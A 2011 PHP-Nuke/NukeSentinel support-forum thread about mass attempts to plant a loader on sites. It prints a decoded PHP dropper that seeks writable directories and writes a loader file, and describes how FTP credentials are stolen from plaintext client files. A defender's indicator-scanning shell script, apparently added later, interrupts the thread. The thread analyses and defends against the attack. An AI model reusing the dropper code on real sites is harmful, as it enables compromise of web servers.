Joined: Dec 19, 2004 Posts: 3143 Location: Germany | Moderator, German NukeSentinel Support
Posted:
Tue Sep 27, 2011 2:55 pm
Be happy NukeSentinel is working.
I have not seen such mass attacks at my sites.
Do you possibly have Google Plus installed in your forums?
I don't really believe this could be the reason, but who knows.
They try to insert the loader in your writeable dirs and etc...
No Google Plus and I stopped counting at 400 attempts. I was more interested in that User Agent string more than anything, never seen one like that before. And YES, thank goodness for NS.
Joined: Oct 01, 2010 Posts: 415 Location: Houston, Tx
Posted:
Wed Sep 28, 2011 2:33 pm
That code, and other code similar to it, allows hackers to remotely infect your website after you've changed FTP passwords.
Also look in your images folders to see if you have a file called gifimg.php. It's malicious as well.
From what we've seen, this type of infection is usually the result of a virus on a PC that has FTP access to the infected website. The virus steals the FTP login credentials, sends them to a server which then infects the website using valid FTP login and password.
The virus works in a variety of ways.
First, if you're using a program like FileZilla or CuteFTP or any of the other free programs, your login credentials are stored in a plain text file on your PC. For FileZilla, look in: C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanager.xml
If you have multiple accounts setup in FileZilla, you'll see all of them listed in plain text in that file. That makes it extremely easy for a virus to find and steal.
Second, the virus works by "sniffing" the FTP traffic leaving your PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see and steal that information.
Third, the virus also acts as a keylogger. So for those who don't save their credentials but type it in each time, the virus can still get it.
I use WS_FTP by IpSwitch because they encrypt their saved credentials. You can also switch to SFTP if your hosting provider supports it. SFTP encrypts the traffic between your PC and the destination.
Quite often it requires a different anti-virus program to find and remove the virus on the infected PC. The virus learns how to evade detection from the currently installed anti-virus.
I usually recommend either Kaspersky or Vipre (Sunbelt Software).
Remove all of those eval(base64_decode strings, then scan all PCs with a different anti-virus program, after changing all FTP passwords.
Your code decoded:
Code:
@ini_set('allow_url_fopen', 1);
// start from the directory the infected script itself lives in
$current_dir = preg_replace('@/$@', '', $_SERVER['DOCUMENT_ROOT'] . '/' . dirname($_SERVER['PHP_SELF']));
if (@is_writable($current_dir)) {
    createLoader($current_dir, '');
} else {
    // otherwise take the first writable subdirectory it can find
    $dirs = @opendir($current_dir);
    while ($dir = @readdir($dirs)) {
        $dir = trim($dir);
        if (!$dir || preg_match('/^\.+$/', $dir) || !@is_dir("$current_dir/$dir") || !@is_writable("$current_dir/$dir")) continue;
        createLoader("$current_dir/$dir", $dir);
        break;
    }
    @closedir($dirs);
}
// drops the loader file and prints a marker string so the caller knows it worked
function createLoader($path, $dir = '') {
    $loaderName = 'loaderz.9aa1d17ea47adbec6a1758849b8ff314.php';
    $fp = fopen("$path/$loaderName", 'w');
    fwrite($fp, base64_decode(DECODED AND PUT IN NEXT CODE BLOCK));
    fclose($fp);
    if (file_exists("$path/$loaderName")) print "91746876256484****{$dir}****";
}
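An added defender-side check (example code, not from this thread, NukeSentinel or PHP-Nuke): a POSIX shell scan of a web root for the three indicators the posts above name, the eval(base64_decode string, the loaderz.<md5>.php file the decoded script drops, and gifimg.php, plus a listing of world-writable directories of the kind the loader's is_writable() walk targets. The only assumption is the web-root path, passed as the argument.

```shell
#!/bin/sh
# Added example, not code from the thread. Scans a web root for the
# indicators the posts above name and for the writable directories the
# decoded loader hunts for. Usage: scan_webroot /path/to/webroot
# Output: one "TAG<TAB>path" line per hit, nothing when clean.

scan_webroot() {
    root="$1"
    # 1. PHP/include files carrying the obfuscated eval(base64_decode string
    #    (fixed-string match, so no regex surprises from the payload itself)
    find "$root" -type f \( -name '*.php' -o -name '*.inc' \) \
        -exec grep -lF 'eval(base64_decode' {} + | awk '{print "EVAL_B64\t" $0}'
    # 2. the dropper the decoded script writes: loaderz.<32 hex chars>.php
    find "$root" -type f -name 'loaderz.*.php' \
        | grep -E '/loaderz\.[0-9a-f]{32}\.php$' | awk '{print "LOADER\t" $0}'
    # 3. gifimg.php, which the post above says to look for in image folders
    find "$root" -type f -name 'gifimg.php' | awk '{print "GIFIMG\t" $0}'
}

# Directories the loader's is_writable() walk would accept. A coarse check:
# it lists only world-writable dirs, while PHP only needs the web-server
# user to have write access, so also review ownership of what this prints.
world_writable_dirs() {
    find "$1" -type d -perm -002 | awk '{print "WRITABLE_DIR\t" $0}'
}

# Number of indicator hits under a web root (0 means nothing matched).
count_hits() {
    scan_webroot "$1" | wc -l | tr -d ' '
}

if [ $# -gt 0 ]; then
    scan_webroot "$1"
    world_writable_dirs "$1"
fi
```

Run it against a backup copy of the site as well as the live tree; a clean live tree with a loader still sitting in a backup will be restored along with it.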
Joined: Aug 28, 2003 Posts: 6373 Location: Vsetin, Czech Republic
Posted:
Wed Sep 28, 2011 3:07 pm
So one way to stop this on a temporary basis would also be to block the script from writing to its database at the IP 109.230.246.115
Their range is 109.230.246.0 - 109.230.246.255
CIDR 109.230.240.0/20
Joined: Oct 01, 2010 Posts: 415 Location: Houston, Tx
Posted:
Wed Sep 28, 2011 3:10 pm
Seems to me that it's actually originating from an infected PC. I'd start by cleaning whatever PCs I FTP "from" (i.e. your own PC)... then make sure the site is clean as well (i.e. check the directories etc.).
It appears that NS has stopped it...but that doesn't mean someone hasn't already gotten your FTP credentials.
***Edit
Here is the dnsstuff on it:
Quote:
inetnum: 109.230.246.0 - 109.230.246.255
netname: XSSERVER-EU
descr: xsserver.eu Dedicated Servers
remarks: +---------------------------------------------------
remarks: | We are Server Provider |
remarks: +---------------------------------------------------
remarks: | |
remarks: | These IP-Numbers are in use by our customers. |
remarks: | In case of Spam/Virus/Portscan/Attack etc |
remarks: | please send an email to *****@xsserver.eu |
remarks: | containing the IP-Number involved and timestamps. |
remarks: | |
remarks: +---------------------------------------------------
remarks: INFRA-AW
country: DE
admin-c: GB11245-RIPE
tech-c: GB11245-RIPE
status: ASSIGNED PA
mnt-by: MNT-XSSERVER
mnt-lower: MNT-XSSERVER
mnt-routes: MNT-XSSERVER
changed: ******@optimate-server.de 20110203
source: RIPE